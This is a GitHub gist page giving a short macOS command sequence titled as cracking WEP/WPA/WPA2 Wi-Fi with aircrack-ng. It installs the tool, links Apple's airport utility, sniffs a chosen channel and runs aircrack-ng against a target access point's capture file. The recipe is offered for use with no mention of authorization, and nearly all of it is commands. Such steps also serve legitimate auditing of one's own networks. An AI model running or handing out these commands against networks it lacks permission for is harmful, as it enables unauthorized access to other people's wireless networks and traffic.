-
-
Save PythonicNinja/49f797fce677a2d01d29f2e123a6e391 to your computer and use it in GitHub Desktop.
Cracking WEP WPA WPA2 WiFi Aircrack. For Mac OSX
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Instalation | |
brew install aircrack-ng | |
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport | |
# sniff mode | |
sudo airport -s | |
# sniffing enabled | |
sudo airport en1 sniff [CHANNEL] | |
# cracking sniffed packets, cap_file will be located in the /tmp/airportSniff*.cap. | |
aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment